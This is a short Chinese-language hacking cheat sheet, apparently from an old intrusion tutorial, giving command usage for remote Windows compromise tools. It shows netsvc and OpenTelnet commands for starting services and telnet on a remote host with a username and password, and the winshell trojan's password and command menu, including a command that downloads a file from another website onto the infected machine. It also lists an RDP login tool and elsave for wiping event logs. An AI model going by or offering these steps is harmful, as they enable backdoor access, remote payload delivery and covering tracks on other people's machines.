============================
一、netsvc.exe
“
”
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的 时间任务 服务:
netsvc /list \\IP
地址
netsvc schedule \\IP
地址 /query
netsvc \\IP
地址 schedule /start
二、OpenTelnet.exe
远程启动主机的 Telnet 服务,并绑定端口到 7878
,例如:
OpenTelnet \\IP
地址 用户名 密码 1 7878
然后就可以 telnet 到主机的 7878 端口,进入 DOS
方式下:
telnet IP
地址 7878
三、winshell.exe
一个非常小的木马(不到 6K),telnet 到主机的 7878 端口,输入密码 winshell,当看到
CMD>
后,可打下面的命令:
p Path (查看 winshell
主程序的路径信息)
b reBoot
(重新启动机器)
d shutDown
(关闭机器)
s Shell
“
(执行后你就会看到可爱的 C:\>”
)
x eXit (退出本次登录会话,此命令并不终止 winshell
的运行)
CMD> http://.../srv.exe (通过 http 下载其他网站上的文件到运行 winshell
的机器上)
四、3389 登陆器,GUI
方式登录远程主机的
五、elsave.exe
事件日志清除工具